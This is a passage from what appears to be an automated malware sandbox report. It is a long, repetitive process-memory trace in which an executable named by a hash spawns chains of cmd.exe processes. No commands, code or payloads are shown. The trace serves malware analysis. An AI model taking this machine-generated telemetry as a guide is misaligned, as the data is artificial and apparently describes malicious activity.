cmd.exe 890 PID 1284 wrote to memory of 208 1284 cmd.exe 891 PID 1284 wrote to memory of 208 1284 cmd.exe 891 PID 1284 wrote to memory of 208 1284 cmd.exe 891 PID 1284 wrote to memory of 208 1284 cmd.exe 891 PID 1096 wrote to memory of 2032 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 892 PID 1096 wrote to memory of 2032 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 892 PID 1096 wrote to memory of 2032 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 892 PID 1096 wrote to memory of 2032 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 892 PID 2032 wrote to memory of 320 2032 cmd.exe 894 PID 2032 wrote to memory of 320 2032 cmd.exe 894 PID 2032 wrote to memory of 320 2032 cmd.exe 894 PID 2032 wrote to memory of 320 2032 cmd.exe 894 PID 2032 wrote to memory of 1676 2032 cmd.exe 895 PID 2032 wrote to memory of 1676 2032 cmd.exe 895 PID 2032 wrote to memory of 1676 2032 cmd.exe 895 PID 2032 wrote to memory of 1676 2032 cmd.exe 895 PID 2032 wrote to memory of 940 2032 cmd.exe 896 PID 2032 wrote to memory of 940 2032 cmd.exe 896 PID 2032 wrote to memory of 940 2032 cmd.exe 896 PID 2032 wrote to memory of 940 2032 cmd.exe 896 PID 940 wrote to memory of 796 940 cmd.exe 897 PID 940 wrote to memory of 796 940 cmd.exe 897 PID 940 wrote to memory of 796 940 cmd.exe 897 PID 940 wrote to memory of 796 940 cmd.exe 897 PID 2032 wrote to memory of 1480 2032 cmd.exe 898 PID 2032 wrote to memory of 1480 2032 cmd.exe 898 PID 2032 wrote to memory of 1480 2032 cmd.exe 898 PID 2032 wrote to memory of 1480 2032 cmd.exe 898 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 899 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 899 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 899 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 899 PID 1276 wrote to memory of 1128 1276 cmd.exe 901 PID 1276 wrote to memory of 1128 1276 cmd.exe 901 PID 1276 wrote to memory of 1128 1276 cmd.exe 901 PID 1276 wrote to memory of 1128 1276 cmd.exe 901 PID 1276 wrote to memory of 960 1276 cmd.exe 902 PID 1276 wrote to memory of 960 1276 cmd.exe 902 PID 1276 wrote to memory of 960 1276 cmd.exe 902 PID 1276 wrote to memory of 960 1276 cmd.exe 902 PID 1276 wrote to memory of 1040 1276 cmd.exe 903 PID 1276 wrote to memory of 1040 1276 cmd.exe 903 PID 1276 wrote to memory of 1040 1276 cmd.exe 903 PID 1276 wrote to memory of 1040 1276 cmd.exe 903 PID 1040 wrote to memory of 1656 1040 cmd.exe 904 PID 1040 wrote to memory of 1656 1040 cmd.exe 904 PID 1040 wrote to memory of 1656 1040 cmd.exe 904 PID 1040 wrote to memory of 1656 1040 cmd.exe 904 PID 1276 wrote to memory of 1212 1276 cmd.exe 905 PID 1276 wrote to memory of 1212 1276 cmd.exe 905 PID 1276 wrote to memory of 1212 1276 cmd.exe 905 PID 1276 wrote to memory of 1212 1276 cmd.exe 905 PID 1096 wrote to memory of 2016 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 906 PID 1096 wrote to memory of 2016 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 906 PID 1096 wrote to memory of 2016 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 906 PID 1096 wrote to memory of 2016 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 906 PID 2016 wrote to memory of 1584 2016 cmd.exe 908 PID 2016 wrote to memory of 1584 2016 cmd.exe 908 PID 2016 wrote to memory of 1584 2016 cmd.exe 908 PID 2016 wrote to memory of 1584 2016 cmd.exe 908 PID 2016 wrote to memory of 204 2016 cmd.exe 909 PID 2016 wrote to memory of 204 2016 cmd.exe 909 PID 2016 wrote to memory of 204 2016 cmd.exe 909 PID 2016 wrote to memory of 204 2016 cmd.exe 909 PID 2016 wrote to memory of 1092 2016 cmd.exe 910 PID 2016 wrote to memory of 1092 2016 cmd.exe 910 PID 2016 wrote to memory of 1092 2016 cmd.exe 910 PID 2016 wrote to memory of 1092 2016 cmd.exe 910 PID 1092 wrote to memory of 236 1092 cmd.exe 911 PID 1092 wrote to memory of 236 1092 cmd.exe 911 PID 1092 wrote to memory of 236 1092 cmd.exe 911 PID 1092 wrote to memory of 236 1092 cmd.exe 911 PID 2016 wrote to memory of 216 2016 cmd.exe 912 PID 2016 wrote to memory of 216 2016 cmd.exe 912 PID 2016 wrote to memory of 216 2016 cmd.exe 912 PID 2016 wrote to memory of 216 2016 cmd.exe 912 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 913 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 913 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 913 PID 1096 wrote to memory of 320 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 913 PID 320 wrote to memory of 896 320 cmd.exe 915 PID 320 wrote to memory of 896 320 cmd.exe 915 PID 320 wrote to memory of 896 320 cmd.exe 915 PID 320 wrote to memory of 896 320 cmd.exe 915 PID 320 wrote to memory of 940 320 cmd.exe 916 PID 320 wrote to memory of 940 320 cmd.exe 916 PID 320 wrote to memory of 940 320 cmd.exe 916 PID 320 wrote to memory of 940 320 cmd.exe 916 PID 320 wrote to memory of 1480 320 cmd.exe 917 PID 320 wrote to memory of 1480 320 cmd.exe 917 PID 320 wrote to memory of 1480 320 cmd.exe 917 PID 320 wrote to memory of 1480 320 cmd.exe 917 PID 1480 wrote to memory of 616 1480 cmd.exe 918 PID 1480 wrote to memory of 616 1480 cmd.exe 918 PID 1480 wrote to memory of 616 1480 cmd.exe 918 PID 1480 wrote to memory of 616 1480 cmd.exe 918 PID 320 wrote to memory of 532 320 cmd.exe 919 PID 320 wrote to memory of 532 320 cmd.exe 919 PID 320 wrote to memory of 532 320 cmd.exe 919 PID 320 wrote to memory of 532 320 cmd.exe 919 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 920 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 920 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 920 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 920 PID 1052 wrote to memory of 1872 1052 cmd.exe 922 PID 1052 wrote to memory of 1872 1052 cmd.exe 922 PID 1052 wrote to memory of 1872 1052 cmd.exe 922 PID 1052 wrote to memory of 1872 1052 cmd.exe 922 PID 1052 wrote to memory of 1076 1052 cmd.exe 923 PID 1052 wrote to memory of 1076 1052 cmd.exe 923 PID 1052 wrote to memory of 1076 1052 cmd.exe 923 PID 1052 wrote to memory of 1076 1052 cmd.exe 923 PID 1052 wrote to memory of 1624 1052 cmd.exe 924 PID 1052 wrote to memory of 1624 1052 cmd.exe 924 PID 1052 wrote to memory of 1624 1052 cmd.exe 924 PID 1052 wrote to memory of 1624 1052 cmd.exe 924 PID 1624 wrote to memory of 2008 1624 cmd.exe 925 PID 1624 wrote to memory of 2008 1624 cmd.exe 925 PID 1624 wrote to memory of 2008 1624 cmd.exe 925 PID 1624 wrote to memory of 2008 1624 cmd.exe 925 PID 1052 wrote to memory of 1068 1052 cmd.exe 926 PID 1052 wrote to memory of 1068 1052 cmd.exe 926 PID 1052 wrote to memory of 1068 1052 cmd.exe 926 PID 1052 wrote to memory of 1068 1052 cmd.exe 926 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 927 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 927 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 927 PID 1096 wrote to memory of 1836 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 927 PID 1836 wrote to memory of 1284 1836 cmd.exe 929 PID 1836 wrote to memory of 1284 1836 cmd.exe 929 PID 1836 wrote to memory of 1284 1836 cmd.exe 929 PID 1836 wrote to memory of 1284 1836 cmd.exe 929 PID 1836 wrote to memory of 1092 1836 cmd.exe 930 PID 1836 wrote to memory of 1092 1836 cmd.exe 930 PID 1836 wrote to memory of 1092 1836 cmd.exe 930 PID 1836 wrote to memory of 1092 1836 cmd.exe 930 PID 1836 wrote to memory of 1372 1836 cmd.exe 931 PID 1836 wrote to memory of 1372 1836 cmd.exe 931 PID 1836 wrote to memory of 1372 1836 cmd.exe 931 PID 1836 wrote to memory of 1372 1836 cmd.exe 931 PID 1372 wrote to memory of 220 1372 cmd.exe 932 PID 1372 wrote to memory of 220 1372 cmd.exe 932 PID 1372 wrote to memory of 220 1372 cmd.exe 932 PID 1372 wrote to memory of 220 1372 cmd.exe 932 PID 1836 wrote to memory of 1832 1836 cmd.exe 933 PID 1836 wrote to memory of 1832 1836 cmd.exe 933 PID 1836 wrote to memory of 1832 1836 cmd.exe 933 PID 1836 wrote to memory of 1832 1836 cmd.exe 933 PID 1096 wrote to memory of 896 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 934 PID 1096 wrote to memory of 896 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 934 PID 1096 wrote to memory of 896 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 934 PID 1096 wrote to memory of 896 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 934 PID 896 wrote to memory of 1548 896 cmd.exe 936 PID 896 wrote to memory of 1548 896 cmd.exe 936 PID 896 wrote to memory of 1548 896 cmd.exe 936 PID 896 wrote to memory of 1548 896 cmd.exe 936 PID 896 wrote to memory of 1516 896 cmd.exe 937 PID 896 wrote to memory of 1516 896 cmd.exe 937 PID 896 wrote to memory of 1516 896 cmd.exe 937 PID 896 wrote to memory of 1516 896 cmd.exe 937 PID 896 wrote to memory of 1128 896 cmd.exe 938 PID 896 wrote to memory of 1128 896 cmd.exe 938 PID 896 wrote to memory of 1128 896 cmd.exe 938 PID 896 wrote to memory of 1128 896 cmd.exe 938 PID 1128 wrote to memory of 820 1128 cmd.exe 939 PID 1128 wrote to memory of 820 1128 cmd.exe 939 PID 1128 wrote to memory of 820 1128 cmd.exe 939 PID 1128 wrote to memory of 820 1128 cmd.exe 939 PID 896 wrote to memory of 1688 896 cmd.exe 940 PID 896 wrote to memory of 1688 896 cmd.exe 940 PID 896 wrote to memory of 1688 896 cmd.exe 940 PID 896 wrote to memory of 1688 896 cmd.exe 940 PID 1096 wrote to memory of 1872 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 941 PID 1096 wrote to memory of 1872 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 941 PID 1096 wrote to memory of 1872 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 941 PID 1096 wrote to memory of 1872 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 941 PID 1872 wrote to memory of 1276 1872 cmd.exe 943 PID 1872 wrote to memory of 1276 1872 cmd.exe 943 PID 1872 wrote to memory of 1276 1872 cmd.exe 943 PID 1872 wrote to memory of 1276 1872 cmd.exe 943 PID 1872 wrote to memory of 1212 1872 cmd.exe 944 PID 1872 wrote to memory of 1212 1872 cmd.exe 944 PID 1872 wrote to memory of 1212 1872 cmd.exe 944 PID 1872 wrote to memory of 1212 1872 cmd.exe 944 PID 1872 wrote to memory of 232 1872 cmd.exe 945 PID 1872 wrote to memory of 232 1872 cmd.exe 945 PID 1872 wrote to memory of 232 1872 cmd.exe 945 PID 1872 wrote to memory of 232 1872 cmd.exe 945 PID 232 wrote to memory of 856 232 cmd.exe 946 PID 232 wrote to memory of 856 232 cmd.exe 946 PID 232 wrote to memory of 856 232 cmd.exe 946 PID 232 wrote to memory of 856 232 cmd.exe 946 PID 1872 wrote to memory of 888 1872 cmd.exe 947 PID 1872 wrote to memory of 888 1872 cmd.exe 947 PID 1872 wrote to memory of 888 1872 cmd.exe 947 PID 1872 wrote to memory of 888 1872 cmd.exe 947 PID 1096 wrote to memory of 1284 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 948 PID 1096 wrote to memory of 1284 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 948 PID 1096 wrote to memory of 1284 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 948 PID 1096 wrote to memory of 1284 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 948 PID 1284 wrote to memory of 2016 1284 cmd.exe 950 PID 1284 wrote to memory of 2016 1284 cmd.exe 950 PID 1284 wrote to memory of 2016 1284 cmd.exe 950 PID 1284 wrote to memory of 2016 1284 cmd.exe 950 PID 1284 wrote to memory of 1372 1284 cmd.exe 951 PID 1284 wrote to memory of 1372 1284 cmd.exe 951 PID 1284 wrote to memory of 1372 1284 cmd.exe 951 PID 1284 wrote to memory of 1372 1284 cmd.exe 951 PID 1284 wrote to memory of 316 1284 cmd.exe 952 PID 1284 wrote to memory of 316 1284 cmd.exe 952 PID 1284 wrote to memory of 316 1284 cmd.exe 952 PID 1284 wrote to memory of 316 1284 cmd.exe 952 PID 316 wrote to memory of 1808 316 cmd.exe 953 PID 316 wrote to memory of 1808 316 cmd.exe 953 PID 316 wrote to memory of 1808 316 cmd.exe 953 PID 316 wrote to memory of 1808 316 cmd.exe 953 PID 1284 wrote to memory of 940 1284 cmd.exe 954 PID 1284 wrote to memory of 940 1284 cmd.exe 954 PID 1284 wrote to memory of 940 1284 cmd.exe 954 PID 1284 wrote to memory of 940 1284 cmd.exe 954 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 955 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 955 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 955 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 955 PID 1476 wrote to memory of 1676 1476 cmd.exe 957 PID 1476 wrote to memory of 1676 1476 cmd.exe 957 PID 1476 wrote to memory of 1676 1476 cmd.exe 957 PID 1476 wrote to memory of 1676 1476 cmd.exe 957 PID 1476 wrote to memory of 1128 1476 cmd.exe 958 PID 1476 wrote to memory of 1128 1476 cmd.exe 958 PID 1476 wrote to memory of 1128 1476 cmd.exe 958 PID 1476 wrote to memory of 1128 1476 cmd.exe 958 PID 1476 wrote to memory of 1744 1476 cmd.exe 959 PID 1476 wrote to memory of 1744 1476 cmd.exe 959 PID 1476 wrote to memory of 1744 1476 cmd.exe 959 PID 1476 wrote to memory of 1744 1476 cmd.exe 959 PID 1744 wrote to memory of 1980 1744 cmd.exe 960 PID 1744 wrote to memory of 1980 1744 cmd.exe 960 PID 1744 wrote to memory of 1980 1744 cmd.exe 960 PID 1744 wrote to memory of 1980 1744 cmd.exe 960 PID 1476 wrote to memory of 1076 1476 cmd.exe 961 PID 1476 wrote to memory of 1076 1476 cmd.exe 961 PID 1476 wrote to memory of 1076 1476 cmd.exe 961 PID 1476 wrote to memory of 1076 1476 cmd.exe 961 PID 1096 wrote to memory of 1112 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 962 PID 1096 wrote to memory of 1112 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 962 PID 1096 wrote to memory of 1112 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 962 PID 1096 wrote to memory of 1112 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 962 PID 1112 wrote to memory of 1584 1112 cmd.exe 964 PID 1112 wrote to memory of 1584 1112 cmd.exe 964 PID 1112 wrote to memory of 1584 1112 cmd.exe 964 PID 1112 wrote to memory of 1584 1112 cmd.exe 964 PID 1112 wrote to memory of 232 1112 cmd.exe 965 PID 1112 wrote to memory of 232 1112 cmd.exe 965 PID 1112 wrote to memory of 232 1112 cmd.exe 965 PID 1112 wrote to memory of 232 1112 cmd.exe 965 PID 1112 wrote to memory of 208 1112 cmd.exe 966 PID 1112 wrote to memory of 208 1112 cmd.exe 966 PID 1112 wrote to memory of 208 1112 cmd.exe 966 PID 1112 wrote to memory of 208 1112 cmd.exe 966 PID 208 wrote to memory of 1152 208 cmd.exe 967 PID 208 wrote to memory of 1152 208 cmd.exe 967 PID 208 wrote to memory of 1152 208 cmd.exe 967 PID 208 wrote to memory of 1152 208 cmd.exe 967 PID 1112 wrote to memory of 216 1112 cmd.exe 968 PID 1112 wrote to memory of 216 1112 cmd.exe 968 PID 1112 wrote to memory of 216 1112 cmd.exe 968 PID 1112 wrote to memory of 216 1112 cmd.exe 968 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 969 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 969 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 969 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 969 PID 1652 wrote to memory of 1500 1652 cmd.exe 971 PID 1652 wrote to memory of 1500 1652 cmd.exe 971 PID 1652 wrote to memory of 1500 1652 cmd.exe 971 PID 1652 wrote to memory of 1500 1652 cmd.exe 971 PID 1652 wrote to memory of 316 1652 cmd.exe 972 PID 1652 wrote to memory of 316 1652 cmd.exe 972 PID 1652 wrote to memory of 316 1652 cmd.exe 972 PID 1652 wrote to memory of 316 1652 cmd.exe 972 PID 1652 wrote to memory of 940 1652 cmd.exe 973 PID 1652 wrote to memory of 940 1652 cmd.exe 973 PID 1652 wrote to memory of 940 1652 cmd.exe 973 PID 1652 wrote to memory of 940 1652 cmd.exe 973 PID 940 wrote to memory of 1284 940 cmd.exe 974 PID 940 wrote to memory of 1284 940 cmd.exe 974 PID 940 wrote to memory of 1284 940 cmd.exe 974 PID 940 wrote to memory of 1284 940 cmd.exe 974 PID 1652 wrote to memory of 532 1652 cmd.exe 975 PID 1652 wrote to memory of 532 1652 cmd.exe 975 PID 1652 wrote to memory of 532 1652 cmd.exe 975 PID 1652 wrote to memory of 532 1652 cmd.exe 975 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 976 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 976 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 976 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 976 PID 1040 wrote to memory of 1816 1040 cmd.exe 978 PID 1040 wrote to memory of 1816 1040 cmd.exe 978 PID 1040 wrote to memory of 1816 1040 cmd.exe 978 PID 1040 wrote to memory of 1816 1040 cmd.exe 978 PID 1040 wrote to memory of 1688 1040 cmd.exe 979 PID 1040 wrote to memory of 1688 1040 cmd.exe 979 PID 1040 wrote to memory of 1688 1040 cmd.exe 979 PID 1040 wrote to memory of 1688 1040 cmd.exe 979 PID 1040 wrote to memory of 2008 1040 cmd.exe 980 PID 1040 wrote to memory of 2008 1040 cmd.exe 980 PID 1040 wrote to memory of 2008 1040 cmd.exe 980 PID 1040 wrote to memory of 2008 1040 cmd.exe 980 PID 2008 wrote to memory of 608 2008 cmd.exe 981 PID 2008 wrote to memory of 608 2008 cmd.exe 981 PID 2008 wrote to memory of 608 2008 cmd.exe 981 PID 2008 wrote to memory of 608 2008 cmd.exe 981 PID 1040 wrote to memory of 968 1040 cmd.exe 982 PID 1040 wrote to memory of 968 1040 cmd.exe 982 PID 1040 wrote to memory of 968 1040 cmd.exe 982 PID 1040 wrote to memory of 968 1040 cmd.exe 982 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 983 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 983 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 983 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 983 PID 1052 wrote to memory of 620 1052 cmd.exe 985 PID 1052 wrote to memory of 620 1052 cmd.exe 985 PID 1052 wrote to memory of 620 1052 cmd.exe 985 PID 1052 wrote to memory of 620 1052 cmd.exe 985 PID 1052 wrote to memory of 1872 1052 cmd.exe 986 PID 1052 wrote to memory of 1872 1052 cmd.exe 986 PID 1052 wrote to memory of 1872 1052 cmd.exe 986 PID 1052 wrote to memory of 1872 1052 cmd.exe 986 PID 1052 wrote to memory of 208 1052 cmd.exe 987 PID 1052 wrote to memory of 208 1052 cmd.exe 987 PID 1052 wrote to memory of 208 1052 cmd.exe 987 PID 1052 wrote to memory of 208 1052 cmd.exe 987 PID 208 wrote to memory of 220 208 cmd.exe 988 PID 208 wrote to memory of 220 208 cmd.exe 988 PID 208 wrote to memory of 220 208 cmd.exe 988 PID 208 wrote to memory of 220 208 cmd.exe 988 PID 1052 wrote to memory of 1376 1052 cmd.exe 989 PID 1052 wrote to memory of 1376 1052 cmd.exe 989 PID 1052 wrote to memory of 1376 1052 cmd.exe 989 PID 1052 wrote to memory of 1376 1052 cmd.exe 989 PID 1096 wrote to memory of 1808 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 990 PID 1096 wrote to memory of 1808 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 990 PID 1096 wrote to memory of 1808 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 990 PID 1096 wrote to memory of 1808 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 990 PID 1808 wrote to memory of 2032 1808 cmd.exe 992 PID 1808 wrote to memory of 2032 1808 cmd.exe 992 PID 1808 wrote to memory of 2032 1808 cmd.exe 992 PID 1808 wrote to memory of 2032 1808 cmd.exe 992 PID 1808 wrote to memory of 1092 1808 cmd.exe 993 PID 1808 wrote to memory of 1092 1808 cmd.exe 993 PID 1808 wrote to memory of 1092 1808 cmd.exe 993 PID 1808 wrote to memory of 1092 1808 cmd.exe 993 PID 1808 wrote to memory of 1284 1808 cmd.exe 994 PID 1808 wrote to memory of 1284 1808 cmd.exe 994 PID 1808 wrote to memory of 1284 1808 cmd.exe 994 PID 1808 wrote to memory of 1284 1808 cmd.exe 994 PID 1284 wrote to memory of 1984 1284 cmd.exe 995 PID 1284 wrote to memory of 1984 1284 cmd.exe 995 PID 1284 wrote to memory of 1984 1284 cmd.exe 995 PID 1284 wrote to memory of 1984 1284 cmd.exe 995 PID 1808 wrote to memory of 1836 1808 cmd.exe 996 PID 1808 wrote to memory of 1836 1808 cmd.exe 996 PID 1808 wrote to memory of 1836 1808 cmd.exe 996 PID 1808 wrote to memory of 1836 1808 cmd.exe 996 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 997 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 997 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 997 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 997 PID 1120 wrote to memory of 1744 1120 cmd.exe 999 PID 1120 wrote to memory of 1744 1120 cmd.exe 999 PID 1120 wrote to memory of 1744 1120 cmd.exe 999 PID 1120 wrote to memory of 1744 1120 cmd.exe 999 PID 1120 wrote to memory of 320 1120 cmd.exe 1000 PID 1120 wrote to memory of 320 1120 cmd.exe 1000 PID 1120 wrote to memory of 320 1120 cmd.exe 1000 PID 1120 wrote to memory of 320 1120 cmd.exe 1000 PID 1120 wrote to memory of 1076 1120 cmd.exe 1001 PID 1120 wrote to memory of 1076 1120 cmd.exe 1001 PID 1120 wrote to memory of 1076 1120 cmd.exe 1001 PID 1120 wrote to memory of 1076 1120 cmd.exe 1001 PID 1076 wrote to memory of 2008 1076 cmd.exe 1002 PID 1076 wrote to memory of 2008 1076 cmd.exe 1002 PID 1076 wrote to memory of 2008 1076 cmd.exe 1002 PID 1076 wrote to memory of 2008 1076 cmd.exe 1002 PID 1120 wrote to memory of 856 1120 cmd.exe 1003 PID 1120 wrote to memory of 856 1120 cmd.exe 1003 PID 1120 wrote to memory of 856 1120 cmd.exe 1003 PID 1120 wrote to memory of 856 1120 cmd.exe 1003 PID 1096 wrote to memory of 1128 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1004 PID 1096 wrote to memory of 1128 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1004 PID 1096 wrote to memory of 1128 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1004 PID 1096 wrote to memory of 1128 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1004 PID 1128 wrote to memory of 888 1128 cmd.exe 1006 PID 1128 wrote to memory of 888 1128 cmd.exe 1006 PID 1128 wrote to memory of 888 1128 cmd.exe 1006 PID 1128 wrote to memory of 888 1128 cmd.exe 1006 PID 1128 wrote to memory of 960 1128 cmd.exe 1007 PID 1128 wrote to memory of 960 1128 cmd.exe 1007 PID 1128 wrote to memory of 960 1128 cmd.exe 1007 PID 1128 wrote to memory of 960 1128 cmd.exe 1007 PID 1128 wrote to memory of 216 1128 cmd.exe 1008 PID 1128 wrote to memory of 216 1128 cmd.exe 1008 PID 1128 wrote to memory of 216 1128 cmd.exe 1008 PID 1128 wrote to memory of 216 1128 cmd.exe 1008 PID 216 wrote to memory of 208 216 cmd.exe 1009 PID 216 wrote to memory of 208 216 cmd.exe 1009 PID 216 wrote to memory of 208 216 cmd.exe 1009 PID 216 wrote to memory of 208 216 cmd.exe 1009 PID 1128 wrote to memory of 1212 1128 cmd.exe 1010 PID 1128 wrote to memory of 1212 1128 cmd.exe 1010 PID 1128 wrote to memory of 1212 1128 cmd.exe 1010 PID 1128 wrote to memory of 1212 1128 cmd.exe 1010 PID 1096 wrote to memory of 236 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1011 PID 1096 wrote to memory of 236 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1011 PID 1096 wrote to memory of 236 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1011 PID 1096 wrote to memory of 236 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1011 PID 236 wrote to memory of 2032 236 cmd.exe 1013 PID 236 wrote to memory of 2032 236 cmd.exe 1013 PID 236 wrote to memory of 2032 236 cmd.exe 1013 PID 236 wrote to memory of 2032 236 cmd.exe 1013 PID 236 wrote to memory of 1676 236 cmd.exe 1014 PID 236 wrote to memory of 1676 236 cmd.exe 1014 PID 236 wrote to memory of 1676 236 cmd.exe 1014 PID 236 wrote to memory of 1676 236 cmd.exe 1014 PID 236 wrote to memory of 1984 236 cmd.exe 1015 PID 236 wrote to memory of 1984 236 cmd.exe 1015 PID 236 wrote to memory of 1984 236 cmd.exe 1015 PID 236 wrote to memory of 1984 236 cmd.exe 1015 PID 1984 wrote to memory of 1868 1984 cmd.exe 1016 PID 1984 wrote to memory of 1868 1984 cmd.exe 1016 PID 1984 wrote to memory of 1868 1984 cmd.exe 1016 PID 1984 wrote to memory of 1868 1984 cmd.exe 1016 PID 236 wrote to memory of 1652 236 cmd.exe 1017 PID 236 wrote to memory of 1652 236 cmd.exe 1017 PID 236 wrote to memory of 1652 236 cmd.exe 1017 PID 236 wrote to memory of 1652 236 cmd.exe 1017 PID 1096 wrote to memory of 1500 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1018 PID 1096 wrote to memory of 1500 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1018 PID 1096 wrote to memory of 